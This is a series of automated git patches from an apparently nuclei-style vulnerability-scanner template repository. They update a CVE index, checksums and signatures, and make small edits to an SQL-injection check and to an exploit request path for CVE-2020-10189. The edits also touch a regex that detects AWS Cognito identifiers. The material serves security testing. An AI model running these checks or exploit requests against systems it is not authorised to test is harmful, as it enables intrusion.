3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"} @@ -2437,6 +2440,7 @@ {"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"} {"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} +{"ID":"CVE-2024-33605","Info":{"Name":"Sharp Multifunction Printers - Directory Listing","Severity":"high","Description":"It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-33605.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"} @@ -2459,6 +2463,7 @@ {"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} +{"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"} {"ID":"CVE-2024-6028","Info":{"Name":"Quiz Maker \u003c= 6.5.8.3 - SQL Injection","Severity":"critical","Description":"The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6028.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 1118bf9368..dbca2a3aa1 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -b82d2c5137c0d383e1c0baa678ff77cb +121ccb9d0bc22208fc61de84492ee126 From e050ff87c1436d70aa423a7350ad23d7058989f9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 08:11:48 +0000 Subject: [PATCH 0868/1841] Auto Generated New Template Addition List [Thu Jul 4 08:11:48 UTC 2024] :robot: --- .new-additions | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.new-additions b/.new-additions index 791dcbedbf..c884e431be 100644 --- a/.new-additions +++ b/.new-additions @@ -1,14 +1,17 @@ +dast/cves/2022/spring4shell-CVE-2022-22965.yaml dast/vulnerabilities/injection/csv-injection.yaml dast/vulnerabilities/injection/xinclude-injection.yaml http/cves/2023/CVE-2023-3380.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-27292.yaml +http/cves/2024/CVE-2024-29972.yaml http/cves/2024/CVE-2024-32709.yaml http/cves/2024/CVE-2024-33605.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml +http/cves/2024/CVE-2024-4434.yaml http/cves/2024/CVE-2024-5522.yaml http/cves/2024/CVE-2024-6028.yaml http/default-logins/apache/apache-apollo-default-login.yaml From 016f5cf026e0f4e8ea2df5fbe34964e2ec2e3c9f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:12:14 +0000 Subject: [PATCH 0870/1841] Auto Generated Templates Checksum [Thu Jul 4 08:12:14 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dc38b4f02c..7a5e10f9c5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,12 +223,13 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:824712a75485cc4bdccfb6decd3525d38b63b459 -cves.json-checksum.txt:688dfaaffcf457f513b140d3aea4d7c0aa6e1a88 +cves.json:471863c8bfa08cf82c7c5ab76b1b2aa3549672b8 +cves.json-checksum.txt:2b097a929a6988afe94e161e7709cefc72d35eee dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e dast/cves/2022/CVE-2022-42889.yaml:bbcd3a85fcaf36a7198fde75caf5c415aa54df50 +dast/cves/2022/spring4shell-CVE-2022-22965.yaml:c8aff28193632eae23c11415b11a94a22edbf93f dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml:cb0a13c0462df4852b6e80e43d710ae520cdd4d6 dast/vulnerabilities/cmdi/ruby-open-rce.yaml:89c6935b600f5037198944b00841ae4e650ee39b dast/vulnerabilities/crlf/cookie-injection.yaml:47b5859ec897917dcc633dee9d83454b203d2ab8 @@ -325,7 +326,7 @@ file/keys/amazon/amazon-mws-auth-token.yaml:dd4d2c578df0cd2f68e0bc493c5822b32309 file/keys/amazon/amazon-session-token.yaml:cd41daf60ae63ebdff0d4584dddf206e624c75cc file/keys/amazon/amazon-sns-token.yaml:12aff5722aac370f04ef6f69b485253f2fe16a87 file/keys/amazon/aws-access-id.yaml:3baced8946c49e9128644b030b02f821a18b6887 -file/keys/amazon/aws-cognito.yaml:1f4f9d029e1941d5965313fbd4b1180628567374 +file/keys/amazon/aws-cognito.yaml:42d3caa4068b8f004bf168782cc499d5f3378b45 file/keys/asana/asana-clientid.yaml:112a8e0c34b9ae77cbaa2fcbd44a73bbfbded327 file/keys/asana/asana-clientsecret.yaml:13ca51f6f04642a35abf8e4a5d8bb46ba48e524d file/keys/atlassian/atlassian-api-token.yaml:639f614d6a7219f6a4b3e4ec4f734f85f68d6074 @@ -8827,7 +8828,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d79968e551d7cd70d90f8cbf020b1b194d32f545 +templates-checksum.txt:c10f6dc68694282fc51fb667c120164f4f48349d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 249e1a7aa1a07b4c16c36c933352a62192ead6c8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:12:38 +0000 Subject: [PATCH 0871/1841] Auto Template Signing [Thu Jul 4 08:12:38 UTC 2024] :robot: --- http/cves/2024/CVE-2024-29972.yaml | 1 + http/exposures/configs/apache-pinot-config.yaml | 1 + http/technologies/apache/apache-pinot-detect.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2024/CVE-2024-29972.yaml b/http/cves/2024/CVE-2024-29972.yaml index f48a6db96e..48f0d75d38 100644 --- a/http/cves/2024/CVE-2024-29972.yaml +++ b/http/cves/2024/CVE-2024-29972.yaml @@ -37,3 +37,4 @@ http: - "status_code == 200" - "contains(body, 'result=0')" condition: and +# digest: 490a0046304402206b2d4cfd5c621781801ef53e7d715b6fc342a1ed7efd9c8062b9eb57cc1e2bc40220525d54e21960aa54a3f0edf5ef9cb5e823657c8de084be264d8f155217d9115d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/configs/apache-pinot-config.yaml b/http/exposures/configs/apache-pinot-config.yaml index 0003226a8e..e46ba34c24 100644 --- a/http/exposures/configs/apache-pinot-config.yaml +++ b/http/exposures/configs/apache-pinot-config.yaml @@ -39,3 +39,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220435aba0dea794b353c1b8d95f9f95755b420236ff5ec0dacc9e8e4e28bb324de022100bce132098d9f1d6f3c5b7ad79bfbe52d6c36559081d7809ebda052cfa51f4f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-pinot-detect.yaml b/http/technologies/apache/apache-pinot-detect.yaml index 74af8dd8aa..46be5c7e9b 100644 --- a/http/technologies/apache/apache-pinot-detect.yaml +++ b/http/technologies/apache/apache-pinot-detect.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100e7bf4e1e04fcf0ae4f5048b3cb4b83d37e19eaf6963cf9824ce03fbbae4b6b1502205e843596c20a4783edef184d15531fdaa9fe25fb1bcf907a163e5cc79019dc4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 133ef5b56d8a164511bfa615f60e63ea07ca186e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 08:12:39 +0000 Subject: [PATCH 0872/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 91888ec1a4..b15034dba4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,17 +3,20 @@ on: push: paths: - '.new-additions' + - 'dast/cves/2022/spring4shell-CVE-2022-22965.yaml' - 'dast/vulnerabilities/injection/csv-injection.yaml' - 'dast/vulnerabilities/injection/xinclude-injection.yaml' - 'http/cves/2023/CVE-2023-3380.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-27292.yaml' + - 'http/cves/2024/CVE-2024-29972.yaml' - 'http/cves/2024/CVE-2024-32709.yaml' - 'http/cves/2024/CVE-2024-33605.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' + - 'http/cves/2024/CVE-2024-4434.yaml' - 'http/cves/2024/CVE-2024-5522.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' - 'http/default-logins/apache/apache-apollo-default-login.yaml' From c4e2b67da3a1a669433a349f3b44af31b75bfbc3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 13:42:53 +0530 Subject: [PATCH 0873/1841] Update azon-dominator-sqli.yaml --- http/vulnerabilities/other/azon-dominator-sqli.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/azon-dominator-sqli.yaml b/http/vulnerabilities/other/azon-dominator-sqli.yaml index 64713b5bae..45ce1f0a14 100644 --- a/http/vulnerabilities/other/azon-dominator-sqli.yaml +++ b/http/vulnerabilities/other/azon-dominator-sqli.yaml @@ -10,10 +10,10 @@ info: - https://www.exploit-db.com/exploits/52059 - https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script metadata: - verified: "true" + verified: true max-request: 1 fofa-query: "Azon Dominator" - tags: azon-dominator,affiliate-marketing-script,sqli + tags: azon,dominator,sqli http: - raw: @@ -28,7 +28,7 @@ http: matchers: - type: dsl dsl: - - 'contains_all(body,"id","name","save_lists.php")' - 'duration>=6' - 'status_code==500' + - 'contains_all(body, "id", "name", "save_lists.php")' condition: and From ec1dca282f990130b4e41d614741fe7076ce14ab Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:16:22 +0000 Subject: [PATCH 0874/1841] Auto Generated Templates Checksum [Thu Jul 4 08:16:22 UTC 2024] :robot: --- templates-checksum.txt | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7a5e10f9c5..259bf881d5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3430,7 +3430,7 @@ http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-29824.yaml:46f1ec812df6008b68dadfc51bc4453cbeda7539 http/cves/2024/CVE-2024-29895.yaml:4a7c770772a2e16187ed8e70815f27e897ae7c52 -http/cves/2024/CVE-2024-29972.yaml:2e36f67ede7a13a76d9a0f25759b76932dd5ed24 +http/cves/2024/CVE-2024-29972.yaml:2d71e67dd5b82d9964e805b0be2b9ebc602ef539 http/cves/2024/CVE-2024-29973.yaml:e44f85b0fe7297f9b0ed996a2e9c7ca9e985fdb9 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 @@ -3469,6 +3469,7 @@ http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 +http/cves/2024/CVE-2024-4434.yaml:51caf6f2e39e823e64467f354b18f2aa00cee323 http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a @@ -4813,7 +4814,7 @@ http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4 http/exposures/configs/amazon-docker-config.yaml:1d8f327855f92a3e31436e4ba787bf72c1593362 http/exposures/configs/ansible-config-disclosure.yaml:49727934f2ea10682033bb7b7d2886c8120e599c http/exposures/configs/apache-config.yaml:f44a3a1e85855c7d7e0a98987e169b4d8c9953de -http/exposures/configs/apache-pinot-config.yaml:7f0c551e050e825923cd69f82442de5d04e4d7b2 +http/exposures/configs/apache-pinot-config.yaml:5e48b64394394c62759e9a054ed422c5a891c50a http/exposures/configs/appspec-yml-disclosure.yaml:6bc7aaae85de1d64d2ad28ca4474205b6cba4a1a http/exposures/configs/appveyor-configuration-file.yaml:20b64eb403f080bf2a11eaf98f3010f97a7ddd39 http/exposures/configs/aws-config.yaml:193af91d07b6ff68bd8ea13f10a65de246c92f4d @@ -6858,7 +6859,7 @@ http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa24 http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a http/technologies/apache/apache-guacamole.yaml:8c7975c569769ee074f51307e0d963b816e631aa http/technologies/apache/apache-karaf-panel.yaml:50fa0b20105a0786c5ce5ddce7aa5c49237bfafa -http/technologies/apache/apache-pinot-detect.yaml:dde9436d642150f3a2c44f4dad0cc638bdb37895 +http/technologies/apache/apache-pinot-detect.yaml:d87ea1adf8a744e4bea49ca48778d43572019d8d http/technologies/apache/apache-tapestry-detect.yaml:e909341eeb3f54c209d395e2d5277b754985d70c http/technologies/apache/apache-zeppelin-detect.yaml:2be8f1552e97541d05b1a9ed6d9fda8b2d9df37d http/technologies/apache/default-apache-test-all.yaml:33897b090e11d9010b30d678a0201c5e4e94b543 @@ -7921,6 +7922,7 @@ http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a7 http/vulnerabilities/other/avada-xss.yaml:09956730db06c6d4aa404e59c94ee74a60dde829 http/vulnerabilities/other/avcon6-execl-lfi.yaml:43a317b3891b8f3dd98a950eec826ee91a95b97d http/vulnerabilities/other/avcon6-lfi.yaml:31fda2c65574c91b2ccd8e140e03243fb9546bd0 +http/vulnerabilities/other/azon-dominator-sqli.yaml:a310586aa178c6f44c9c6aef46b653a50593f439 http/vulnerabilities/other/bagisto-csti.yaml:dcc7c57c641a9a49e1e67ca561abce1574214656 http/vulnerabilities/other/bems-api-lfi.yaml:4b2ace615d63afc61e4401ca7c6d6bd3c7e0a02a http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:4461c2309baf099cca67518def7863f003f459ac @@ -8828,7 +8830,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c10f6dc68694282fc51fb667c120164f4f48349d +templates-checksum.txt:6ad4e8d8c4fde6a2cfb0d2c738b207a960367008 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6743d86578dbd90e0109bcf11f0eaa0f1bb2afaa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:18:06 +0000 Subject: [PATCH 0875/1841] Auto Template Signing [Thu Jul 4 08:18:06 UTC 2024] :robot: --- dast/cves/2022/spring4shell-CVE-2022-22965.yaml | 1 + file/keys/amazon/aws-cognito.yaml | 1 + http/cves/2024/CVE-2024-4434.yaml | 1 + http/vulnerabilities/other/azon-dominator-sqli.yaml | 1 + 4 files changed, 4 insertions(+) diff --git a/dast/cves/2022/spring4shell-CVE-2022-22965.yaml b/dast/cves/2022/spring4shell-CVE-2022-22965.yaml index 5996d07c42..c00d24e31b 100644 --- a/dast/cves/2022/spring4shell-CVE-2022-22965.yaml +++ b/dast/cves/2022/spring4shell-CVE-2022-22965.yaml @@ -55,3 +55,4 @@ http: words: - "User-Agent: Java" case-insensitive: true +# digest: 4a0a00473045022100f1df7c78db6ea59f563fba964213db01df8db2175cef7aebd7305a7c22825f3e022042961850d5ac0de44893784ebf9d745a0cf6049b94fc4c846c1d496640da997e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/keys/amazon/aws-cognito.yaml b/file/keys/amazon/aws-cognito.yaml index dda00456de..d99f59446c 100644 --- a/file/keys/amazon/aws-cognito.yaml +++ b/file/keys/amazon/aws-cognito.yaml @@ -19,3 +19,4 @@ file: - type: regex regex: - "(ap|ca|eu|sa|us)-(east|southeast|south|west|north|central)-[0-9]:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9a-z]{12}" +# digest: 4b0a004830460221008a0b8e05d12aeded469c823135d353111935c43997738c98766697c7678f448a022100c8d5e2b74b0445b07aba1af9d04f2b0dcd7b283d2575584472175f0746465201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4434.yaml b/http/cves/2024/CVE-2024-4434.yaml index a4b03576a5..fe1d1745be 100644 --- a/http/cves/2024/CVE-2024-4434.yaml +++ b/http/cves/2024/CVE-2024-4434.yaml @@ -56,3 +56,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","is_course_archive"' internal: true +# digest: 4a0a00473045022100805a19beed0925918e48fe60dabee80e439f5ff19ca82f8de67f3ae2e519961002203b48fc2db31392293b96ed2bc9fd008e41f94a023be3e094412dd969f8b06752:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/azon-dominator-sqli.yaml b/http/vulnerabilities/other/azon-dominator-sqli.yaml index 45ce1f0a14..3af93968ba 100644 --- a/http/vulnerabilities/other/azon-dominator-sqli.yaml +++ b/http/vulnerabilities/other/azon-dominator-sqli.yaml @@ -32,3 +32,4 @@ http: - 'status_code==500' - 'contains_all(body, "id", "name", "save_lists.php")' condition: and +# digest: 490a0046304402202ce1f0e22b85672b369795df066d967e2c595e6e8653e6ef08f900fea9abf5ea022078941fc73d22571802c7ba4a0f9011863bae207e5f54940d6bb4fc288dc2a4b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c7da7e51d00064323f7420d2f9d5acddf2f91690 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 13:55:16 +0530 Subject: [PATCH 0876/1841] update req --- http/cves/2020/CVE-2020-10189.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index a6332680e6..39653c65ca 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -54,7 +54,7 @@ http: - raw: - | - POST /cewolf/?img=%5Clogger.zip HTTP/1.1 + GET /cewolf/?img=%5Clogger.zip HTTP/1.1 Host: {{Hostname}} matchers-condition: and From 90f9a2e8cc48137e8a4568ee127ed4f0813ca5ce Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 08:28:26 +0000 Subject: [PATCH 0877/1841] Auto Generated New Template Addition List [Thu Jul 4 08:28:26 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index c884e431be..f55a063857 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ dast/cves/2022/spring4shell-CVE-2022-22965.yaml dast/vulnerabilities/injection/csv-injection.yaml dast/vulnerabilities/injection/xinclude-injection.yaml +http/cves/2020/CVE-2020-10189.yaml http/cves/2023/CVE-2023-3380.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml @@ -36,5 +37,6 @@ http/technologies/neo4j-neodash-detect.yaml http/technologies/wordpress/plugins/chaty.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml http/vulnerabilities/next-js-cache-poisoning.yaml +http/vulnerabilities/other/azon-dominator-sqli.yaml http/vulnerabilities/other/bagisto-csti.yaml http/vulnerabilities/other/sharp-printers-lfi.yaml From b78ae2896edda85d94c0e014a24da608530b9353 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:28:32 +0000 Subject: [PATCH 0878/1841] Auto Generated Templates Checksum [Thu Jul 4 08:28:32 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 259bf881d5..05238a7679 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -229,7 +229,7 @@ dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e dast/cves/2022/CVE-2022-42889.yaml:bbcd3a85fcaf36a7198fde75caf5c415aa54df50 -dast/cves/2022/spring4shell-CVE-2022-22965.yaml:c8aff28193632eae23c11415b11a94a22edbf93f +dast/cves/2022/spring4shell-CVE-2022-22965.yaml:b06e680a4f4a91caf59d92fce692ee8d8ade94d1 dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml:cb0a13c0462df4852b6e80e43d710ae520cdd4d6 dast/vulnerabilities/cmdi/ruby-open-rce.yaml:89c6935b600f5037198944b00841ae4e650ee39b dast/vulnerabilities/crlf/cookie-injection.yaml:47b5859ec897917dcc633dee9d83454b203d2ab8 @@ -326,7 +326,7 @@ file/keys/amazon/amazon-mws-auth-token.yaml:dd4d2c578df0cd2f68e0bc493c5822b32309 file/keys/amazon/amazon-session-token.yaml:cd41daf60ae63ebdff0d4584dddf206e624c75cc file/keys/amazon/amazon-sns-token.yaml:12aff5722aac370f04ef6f69b485253f2fe16a87 file/keys/amazon/aws-access-id.yaml:3baced8946c49e9128644b030b02f821a18b6887 -file/keys/amazon/aws-cognito.yaml:42d3caa4068b8f004bf168782cc499d5f3378b45 +file/keys/amazon/aws-cognito.yaml:2ae72475ba695d55a8af4d36984b269cd886dd73 file/keys/asana/asana-clientid.yaml:112a8e0c34b9ae77cbaa2fcbd44a73bbfbded327 file/keys/asana/asana-clientsecret.yaml:13ca51f6f04642a35abf8e4a5d8bb46ba48e524d file/keys/atlassian/atlassian-api-token.yaml:639f614d6a7219f6a4b3e4ec4f734f85f68d6074 @@ -1816,6 +1816,7 @@ http/cves/2019/CVE-2019-9955.yaml:aa1f5d5783764fa700842f5a8d7bec989d60f572 http/cves/2019/CVE-2019-9978.yaml:ebc3ac73c1bc381c952a6d283b524b7defc38a77 http/cves/2020/CVE-2020-0618.yaml:ba66da0763579b0aea33e37bd6b9124cc35a7419 http/cves/2020/CVE-2020-10148.yaml:d43a17911b224fa2d73eb14d13f55b78f9f11e28 +http/cves/2020/CVE-2020-10189.yaml:10866e53b542268c4503f76ea8681972e02c4861 http/cves/2020/CVE-2020-10199.yaml:b93ee10549d24ac7a2207b525846b37e90c70ee4 http/cves/2020/CVE-2020-10220.yaml:5943d426d223a9162b34d7a51569878e7fbc92f8 http/cves/2020/CVE-2020-10546.yaml:4cbf1b7e152d7cffe84df5feef391dfcd46438dc @@ -3469,7 +3470,7 @@ 